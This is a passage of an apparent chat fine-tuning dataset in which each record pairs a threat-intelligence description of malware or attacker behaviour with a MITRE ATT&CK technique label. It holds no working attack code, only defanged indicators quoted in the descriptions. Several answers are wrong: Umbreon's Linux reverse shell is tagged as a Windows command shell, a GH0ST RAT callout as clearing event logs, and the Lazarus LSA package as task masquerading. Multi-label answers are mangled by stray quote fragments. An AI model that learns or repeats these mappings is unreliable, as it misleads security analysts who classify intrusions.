be abused by adversaries to transfer tools or files between systems within a compromised environment." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon creates a new service named “ntssrv” to execute the payload. Newer versions create the \"MaintenaceSrv\" and \"hdv_725x\" services." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Common TCP ports 80 and 443 are used to blend in with routine network traffic" }, { "role": "assistant", "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke can used pipes to connect machines with restricted internet access to remote machines via other infected hosts." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest." }, { "role": "assistant", "content": "T1608.004 - Drive-by Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can send files from a victim's machine to Dropbox." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a simple one-byte XOR method to obfuscate values in the malware." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows can check if the explorer.exe process is responsible for calling its install function." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used stolen credentials to access administrative accounts within the domain." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used scheduled tasks to persist on victim systems." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peppy has the ability to execute shell commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OopsIE Trojan is configured to use a C2 server hosted at:www.msoffice365cdn[.]com The Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server’s response looking for content within the tags 
 and
" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1573 - Encrypted Channel', 'T1102 - Web Service', 'T1041 - Exfiltration Over C2 Channel', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Nefilim ransomware uses a batch file to stop services and kill processes in the local host. This batch file abuses taskill.exe using CMD to kill predefined services and processes in the target host. Nefilim distributes this batch file to multiple hosts using two batch files. One of the batch files uses the ‘copy’ command, and the other one uses WMI with hard-coded admin credentials." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver can collect network connection information." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) - zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt - txt is uploaded to the control server" }, { "role": "assistant", "content": "T1560 - Archive Collected Data', 'T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named “Annual Bonus Report.doc”. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox can enumerate the username on a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession can launch itself from a hollowed svchost.exe process." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The uploader or malware the uploader uses command to delete the RAR archives after they have been exfiltrated." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the account name of the logged-in user and sends it to the C2." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used `move` to transfer files to a network share." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy's Delphi variant was packed with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WINERACK can gather information on the victim username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron has used AES and XOR to decrypt configuration files and commands." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanBot can download additional files to a targeted system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"net view \\\\remotesystem\" and \"net share\" commands in Net can be used to find shared drives and directories on remote and local systems respectively." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver encrypts some of its files with XOR." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry uses Tor for command and control traffic." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of FakeM use RC4 to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot can identify the OS version, CPU, and other details from a victim's machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1" }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used web shells for persistence or to ensure redundant access." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has queried the Cloud Instance Metadata API for cloud credentials." }, { "role": "assistant", "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Andariel has limited its watering hole attacks to specific IP address ranges." }, { "role": "assistant", "content": "T1590.005 - IP Addresses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp checks for availability of specific ports on servers." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya can use valid credentials with PsExec or \"wmic\" to spread itself to remote systems." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "avoids analysis by encrypting all strings, internal files, configuration data." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman has the ability to self-extract as a RAR archive." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “SYSTEM.zip” and “comps.zip" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can execute \"enum\" to enumerate files in storage on a compromised system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used the open source tool Essential NetTools to map the network and build a list of targets." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: Dell SecureWorks) The following tools appear to be exclusive to TG-3390: OwaAuth web shell — A web shell and credential stealer deployed to Microsoft Exchange servers" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist has the ability to download additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors dumped LSASS process memory by using 'rundll32.exe' to execute the MiniDump function exported by the native Windows® DLL 'comsvcs.dll'." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques." }, { "role": "assistant", "content": "T1127 - Trusted Developer Utilities Proxy Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RemoteUtilities can enumerate files and directories on a target machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has renamed the WinRAR utility to avoid detection." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Lazarus Group custom backdoor implant included a custom PE loader named \"Security Package\" that was added into the lsass.exe process via registry key." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has password-protected malicious Word documents and used base64 encoded PowerShell commands." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ccf32 can temporarily store files in a hidden directory on the local host." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ragnar Locker has used rundll32.exe to execute components of VirtualBox." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "More_eggs uses HTTPS for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt and then executes it" }, { "role": "assistant", "content": "T1583.006 - Web Services', 'T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, REvil ransomware marks its binary code for deletion during the next reboot and terminates execution" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StoneDrill can take screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attacker’s choice of IP addresses was also optimized to evade detection. The attacker primarily used only IP addresses originating from the same country as the victim, leveraging Virtual Private Servers" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer has copied itself to the \":bin\" alternate data stream of a newly created file." }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maintain Presence APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has encrypted its binaries via AES and encoded files using Base64." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used the Microsoft administration tool csvde.exe to export Active Directory data." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decrypting the C&C server address, the shellcode proceeds to send an HTTP GET request to fetch the resource: “msdn.cpp” on the server" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cmd can be used to copy files to/from a remotely connected internal system." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon exploitation, a GH0ST RAT variant is delivered to the victims’ system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code" }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After initialization, the code monitors browser activities, looking for online banking sessions. Once these are found, the malware enables the attacker to display an overlay window in front of the victim’s browser to manipulate the user’s session in the background. In this way, the fraudulent transaction is performed from the victim’s machine, making it harder to detect for anti-fraud solutions on the bank’s end. The criminal can also request specific information, asked during the bank transaction, such as a secondary password and token, bypassing two-factor authentication solutions adopted by the financial sector" }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking', 'T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing 